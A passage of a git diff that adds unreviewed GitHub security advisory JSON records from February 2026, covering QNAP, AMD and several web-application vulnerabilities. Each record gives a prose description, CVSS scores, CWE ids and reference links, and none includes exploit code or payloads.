"github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4c6-xx88-2hqq/GHSA-g4c6-xx88-2hqq.json b/advisories/unreviewed/2026/02/GHSA-g4c6-xx88-2hqq/GHSA-g4c6-xx88-2hqq.json new file mode 100644 index 0000000000000..2b4ca3382c787 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g4c6-xx88-2hqq/GHSA-g4c6-xx88-2hqq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4c6-xx88-2hqq", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-62853" + ], + "details": "A path traversal vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5166 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62853" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4hh-hm34-58p5/GHSA-g4hh-hm34-58p5.json b/advisories/unreviewed/2026/02/GHSA-g4hh-hm34-58p5/GHSA-g4hh-hm34-58p5.json new file mode 100644 index 0000000000000..3bebcc0e74783 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g4hh-hm34-58p5/GHSA-g4hh-hm34-58p5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4hh-hm34-58p5", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-57711" + ], + "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57711" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4r6-4jg4-9556/GHSA-g4r6-4jg4-9556.json b/advisories/unreviewed/2026/02/GHSA-g4r6-4jg4-9556/GHSA-g4r6-4jg4-9556.json new file mode 100644 index 0000000000000..f8384a342f698 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g4r6-4jg4-9556/GHSA-g4r6-4jg4-9556.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4r6-4jg4-9556", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2024-36320" + ], + "details": "Integer Overflow within atihdwt6.sys can allow a local attacker to cause out of bound read/write potentially leading to loss of confidentiality, integrity and availability", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36320" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4xh-r45m-435w/GHSA-g4xh-r45m-435w.json b/advisories/unreviewed/2026/02/GHSA-g4xh-r45m-435w/GHSA-g4xh-r45m-435w.json new file mode 100644 index 0000000000000..e8db31c35257c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g4xh-r45m-435w/GHSA-g4xh-r45m-435w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4xh-r45m-435w", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-57709" + ], + "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57709" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g7hj-9w6f-45m2/GHSA-g7hj-9w6f-45m2.json b/advisories/unreviewed/2026/02/GHSA-g7hj-9w6f-45m2/GHSA-g7hj-9w6f-45m2.json new file mode 100644 index 0000000000000..7fd84247d26e0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g7hj-9w6f-45m2/GHSA-g7hj-9w6f-45m2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g7hj-9w6f-45m2", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-47209" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47209" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g94q-pfx9-4w8h/GHSA-g94q-pfx9-4w8h.json b/advisories/unreviewed/2026/02/GHSA-g94q-pfx9-4w8h/GHSA-g94q-pfx9-4w8h.json new file mode 100644 index 0000000000000..c903c79fdf52a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g94q-pfx9-4w8h/GHSA-g94q-pfx9-4w8h.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g94q-pfx9-4w8h", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2025-48503" + ], + "details": "A DLL hijacking vulnerability in the AMD Software Installer could allow an attacker to achieve privilege escalation potentially resulting in arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48503" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcmq-wqmm-m5gf/GHSA-gcmq-wqmm-m5gf.json b/advisories/unreviewed/2026/02/GHSA-gcmq-wqmm-m5gf/GHSA-gcmq-wqmm-m5gf.json new file mode 100644 index 0000000000000..f000f5ff49345 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcmq-wqmm-m5gf/GHSA-gcmq-wqmm-m5gf.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcmq-wqmm-m5gf", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25315" + ], + "details": "WordPress Server Log Viewer 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts through unfiltered log file paths. Attackers can add log files with embedded XSS payloads that will execute when viewed in the WordPress admin interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25315" + }, + { + "type": "WEB", + "url": "https://github.com/anttiviljami/wp-server-log-viewer" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47419" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/wp-server-log-viewer-logfile-persistent-cross-site-scripting" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json b/advisories/unreviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json new file mode 100644 index 0000000000000..6ca2d5d444e6c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcpq-mrgg-v5f3", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2018-25157" + ], + "details": "Phraseanet 4.0.3 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts through crafted file names during document uploads. Attackers can upload files with embedded SVG scripts that execute in the browser, potentially stealing cookies or redirecting users when the file is viewed.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25157" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46935" + }, + { + "type": "WEB", + "url": "https://www.phraseanet.com" + }, + { + "type": "WEB", + "url": "https://www.phraseanet.com/en/download" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/phraseanet-stored-xss-via-document-upload" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h33h-3xrc-r94p/GHSA-h33h-3xrc-r94p.json b/advisories/unreviewed/2026/02/GHSA-h33h-3xrc-r94p/GHSA-h33h-3xrc-r94p.json new file mode 100644 index 0000000000000..0952b846c1348 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h33h-3xrc-r94p/GHSA-h33h-3xrc-r94p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h33h-3xrc-r94p", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2023-20514" + ], + "details": "Improper handling of parameters in the AMD Secure Processor (ASP) could allow a privileged attacker to pass an arbitrary memory value to functions in the trusted execution environment resulting in arbitrary code execution", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20514" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/Emb-Auto.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-233" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h3fv-27fp-2c8j/GHSA-h3fv-27fp-2c8j.json b/advisories/unreviewed/2026/02/GHSA-h3fv-27fp-2c8j/GHSA-h3fv-27fp-2c8j.json new file mode 100644 index 0000000000000..17ca1a1d7a97c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h3fv-27fp-2c8j/GHSA-h3fv-27fp-2c8j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h3fv-27fp-2c8j", + "modified": "2026-02-11T15:30:24Z", + "published": "2026-02-11T15:30:24Z", + "aliases": [ + "CVE-2024-56807" + ], + "details": "An out-of-bounds read vulnerability has been reported to affect Media Streaming add-on. If an attacker gains local network access, they can then exploit the vulnerability to obtain secret data.\n\nWe have already fixed the vulnerability in the following version:\nMedia Streaming add-on 500.1.1.6 ( 2024/08/02 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56807" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-25-57" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h7qq-mch4-gjx3/GHSA-h7qq-mch4-gjx3.json b/advisories/unreviewed/2026/02/GHSA-h7qq-mch4-gjx3/GHSA-h7qq-mch4-gjx3.json new file mode 100644 index 0000000000000..616b9503b6a72 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h7qq-mch4-gjx3/GHSA-h7qq-mch4-gjx3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7qq-mch4-gjx3", + "modified": "2026-02-11T15:30:24Z", + "published": "2026-02-11T15:30:24Z", + "aliases": [ + "CVE-2024-56808" + ], + "details": "A command injection vulnerability has been reported to affect Media Streaming add-on. If an attacker gains local network access who have also gained a user account, they can then exploit the vulnerability to execute arbitrary commands.\n\nWe have already fixed the vulnerability in the following version:\nMedia Streaming add-on 500.1.1.6 ( 2024/08/02 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:P/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56808" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-25-57" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j7v8-xc2j-g5q6/GHSA-j7v8-xc2j-g5q6.json b/advisories/unreviewed/2026/02/GHSA-j7v8-xc2j-g5q6/GHSA-j7v8-xc2j-g5q6.json new file mode 100644 index 0000000000000..1f62207846721 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j7v8-xc2j-g5q6/GHSA-j7v8-xc2j-g5q6.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j7v8-xc2j-g5q6", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2023-31324" + ], + "details": "A Time-of-check time-of-use (TOCTOU) race condition in the AMD Secure Processor (ASP) could allow an attacker to modify External Global Memory Interconnect Trusted Agent (XGMI TA) commands as they are processed potentially resulting in loss of confidentiality, integrity, or availability.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31324" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jg28-4x4g-x78q/GHSA-jg28-4x4g-x78q.json b/advisories/unreviewed/2026/02/GHSA-jg28-4x4g-x78q/GHSA-jg28-4x4g-x78q.json new file mode 100644 index 0000000000000..2f290e7b5a276 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jg28-4x4g-x78q/GHSA-jg28-4x4g-x78q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jg28-4x4g-x78q", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25316" + ], + "details": "GOautodial 4.0 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the event title parameter. Attackers can exploit the CreateEvent.php endpoint by sending crafted POST requests with XSS payloads to execute arbitrary JavaScript in victim browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25316" + }, + { + "type": "WEB", + "url": "https://goautodial.org" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47402" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/goautodial-createevent-persistent-cross-site-scripting" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jwg7-4hhr-69vp/GHSA-jwg7-4hhr-69vp.json b/advisories/unreviewed/2026/02/GHSA-jwg7-4hhr-69vp/GHSA-jwg7-4hhr-69vp.json new file mode 100644 index 0000000000000..43df98543ab5c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jwg7-4hhr-69vp/GHSA-jwg7-4hhr-69vp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jwg7-4hhr-69vp", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54150" + ], + "details": "An uncontrolled resource consumption vulnerability has been reported to affect Qsync Central. If a local attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54150" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m5h7-v442-fv53/GHSA-m5h7-v442-fv53.json b/advisories/unreviewed/2026/02/GHSA-m5h7-v442-fv53/GHSA-m5h7-v442-fv53.json new file mode 100644 index 0000000000000..3410d5db0ba2b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m5h7-v442-fv53/GHSA-m5h7-v442-fv53.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m5h7-v442-fv53", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-58472" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58472" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mcfq-f994-8hqg/GHSA-mcfq-f994-8hqg.json b/advisories/unreviewed/2026/02/GHSA-mcfq-f994-8hqg/GHSA-mcfq-f994-8hqg.json new file mode 100644 index 0000000000000..9d181d0b7554d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mcfq-f994-8hqg/GHSA-mcfq-f994-8hqg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mcfq-f994-8hqg", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-57713" + ], + "details": "A weak authentication vulnerability has been reported to affect File Station 5. The remote attackers can then exploit the vulnerability to gain sensitive information.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5166 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57713" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1390" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json b/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json new file mode 100644 index 0000000000000..db710aacbb106 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p866-9g89-mc5v", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-52868" + ], + "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52868" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + 